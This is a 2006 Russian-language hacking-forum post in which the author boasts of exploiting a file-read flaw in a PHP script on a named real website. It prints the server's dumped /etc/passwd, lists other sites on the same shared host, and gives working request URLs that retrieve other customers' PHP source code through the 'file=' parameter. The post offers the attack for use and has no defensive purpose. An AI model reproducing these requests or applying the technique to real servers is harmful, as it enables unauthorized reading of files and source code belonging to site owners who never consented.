17.05.2006, 09:50
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
С нами:
10539746
Репутация:
1276
|
|
Решил выложить концовку:
Еще обнаружил интересную вещь, если нет доступа к папке, выдает сообщение что нет доступа. А самое интересное то, что можно читать файлы в этой директории. Значит задача остается в том, что бы определить истинный путь к файлам, и затем их читать!
Вот пара примеров на hxxp://www.aleviler.biz
/etc/passwd выдает вот это
PHP код:
mailman:x:72:67:GNU mailing list manager:/var/lib/mailman:/bin/bash
ldap:x:76:70:User for OpenLDAP:/var/lib/ldap:/bin/bash
radiusd:x:100:101:Radius daemon:/var/lib/radiusd:/bin/false
privoxy:x:101:102:Daemon user for privoxy:/var/lib/privoxy:/bin/false
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
web1:x:20071:102::/srv/www/htdocs/web1:/bin/false
web2:x:20072:102::/srv/www/htdocs/web2:/bin/false
web5:x:20077:102::/srv/www/htdocs/web5:/bin/false
web3:x:20074:102::/srv/www/htdocs/web3:/bin/false
web4:x:20076:102::/srv/www/htdocs/web4:/bin/false
web6:x:20078:102::/srv/www/htdocs/web6:/bin/false
web7:x:20079:102::/srv/www/htdocs/web7:/bin/false
web8:x:20080:102::/srv/www/htdocs/web8:/bin/false
На это хосте зарегистрированы следующие сайты
PHP код:
asflug.com, flirtcity.biz, internationale-buchhandlung.com, lust-auf-reise.com, powerstore.info, rentpark.net и т.д
На прямую он недает обратится к папка hxxp://www.aleviler.biz/hpmaker/qq.php?file=/srv/www/htdocs/web36/
PHP код:
Sorry... File
/srv/www/htdocs/web36/ dosen't exists or you don't have
access.
Но если обратится к файлам hxxt://www.aleviler.biz/hpmaker/qq.php?file=/srv/www/htdocs/web1/html/index.php
hxxt://www.aleviler.biz/hpmaker/qq.php?file=/srv/www/htdocs/web23/html/index.php
hxxt://www.aleviler.biz/hpmaker/qq.php?file=/srv/www/htdocs/web36/html/index.php
Выдается исходный код!!!
Алилуя!!! |
|
|